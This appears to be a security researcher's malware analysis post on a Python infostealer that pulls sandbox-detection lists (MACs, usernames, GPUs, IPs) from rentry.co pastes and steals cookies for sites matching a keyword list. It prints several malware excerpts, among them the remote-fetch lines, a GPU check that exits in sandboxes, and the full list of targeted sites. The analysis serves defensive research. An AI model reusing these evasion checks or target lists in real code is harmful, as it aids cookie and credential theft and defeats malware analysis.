Python InfoStealer With Dynamic Sandbox Detection
Infostealers written in Python are not new. They also onboard a lot of sandbox detection mechanisms to prevent being executed (and probably detected) by automatic analysis. Last week, I found one that uses the same approach but in a different way. Usually, the scripts have a list of "bad stuff" to check like MAC addresses, usernames, processes, etc. These are common ways to detect simple sandboxes that are not well-hardened. This time, the "IOD" (Indicators Of Detection) list is stored online on a Pastebin-like site, allowing the indicators to be updated for all scripts already deployed. It's also a way to disclose less interesting information in the script.
The file, called main.py, has a VT score of 22/61 (SHA256: e0f6dcf43e19d3ff5d2c19abced7ddc2e703e4083fbdebce5a7d44a4395d7d06)[1]
The script will fetch indicators from many files hosted on rentry.co[2]:
remnux@remnux:/MalwareZoo/20240217$ grep hxxps://rentry[.]co main.py
processl = requests.get("hxxps://rentry[.]co/x6g3is75/raw").text
mac_list = requests.get("hxxps://rentry[.]co/ty8exwnb/raw").text
vm_name = requests.get("hxxps://rentry[.]co/3wr3rpme/raw").text
vmusername = requests.get("hxxps://rentry[.]co/bnbaac2d/raw").text
hwid_vm = requests.get("hxxps://rentry[.]co/fnimmyya/raw").text
gpulist = requests.get("hxxps://rentry[.]co/povewdm6/raw").text
ip_list = requests.get("hxxps://rentry[.]co/hikbicky/raw").text
guid_pc = requests.get("hxxps://rentry[.]co/882rg6dc/raw").text
bios_guid = requests.get("hxxps://rentry[.]co/hxtfvkvq/raw").text
baseboard_guid = requests.get("hxxps://rentry[.]co/rkf2g4oo/raw").text
serial_disk = requests.get("hxxps://rentry[.]co/rct2f8fc/raw").text
All files were published on January 27 2024 around 23:19 UTC. The website gives also the number of views. Currently, there are only two (certainly my visits) so the script hasn't been released in the wild yet. I'll keep an eye on these counters in the coming days.
Here is an example of usage:
def checkgpu(self):
c = wmi.WMI()
for gpu in c.Win32_DisplayConfiguration():
GPUm = gpu.Description.strip()
gpulist = requests.get("https://rentry.co/povewdm6/raw").text
if GPUm in gpulist:
sys.exit()
The remaining part of the stealer is very classic. I just extracted the list of targeted websites (cookies are collected and exfiltrated):
keyword = [
'mail',
'[coinbase](https://coinbase.com)',
'[sellix](https://sellix.io)',
'[gmail](https://gmail.com)',
'[steam](https://steam.com)',
'[discord](https://discord.com)',
'[riotgames](https://riotgames.com)',
'[youtube](https://youtube.com)',
'[instagram](https://instagram.com)',
'[tiktok](https://tiktok.com)',
'[twitter](https://twitter.com)',
'[facebook](https://facebook.com)',
'card',
'[epicgames](https://epicgames.com)',
'[spotify](https://spotify.com)',
'[yahoo](https://yahoo.com)',
'[roblox](https://roblox.com)',
'[twitch](https://twitch.com)',
'[minecraft](https://minecraft.net)',
'bank',
'[paypal](https://paypal.com)',
'[origin](https://origin.com)',
'[amazon](https://amazon.com)',
'[ebay](https://ebay.com)',
'[aliexpress](https://aliexpress.com)',
'[playstation](https://playstation.com)',
'[hbo](https://hbo.com)',
'[xbox](https://xbox.com)',
'buy',
'sell',
'[binance](https://binance.com)',
'[hotmail](https://hotmail.com)',
'[outlook](https://outlook.com)',
'[crunchyroll](https://crunchyroll.com)',
'[telegram](https://telegram.com)',
'[pornhub](https://pornhub.com)',
'[disney](https://disney.com)',
'[expressvpn](https://expressvpn.com)',
'crypto',
'[uber](https://uber.com)',
'[netflix](https://netflix.com)'
]
You can see that classic sites are targeted but generic keywords are also present like "crypto", "bank" or "card". Cookies belonging to URLs containing these keywords will also be exfiltrated.
[1] https://www.virustotal.com/gui/file/e0f6dcf43e19d3ff5d2c19abced7ddc2e703e4083fbdebce5a7d44a4395d7d06/details
[2] https://rentry.co
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments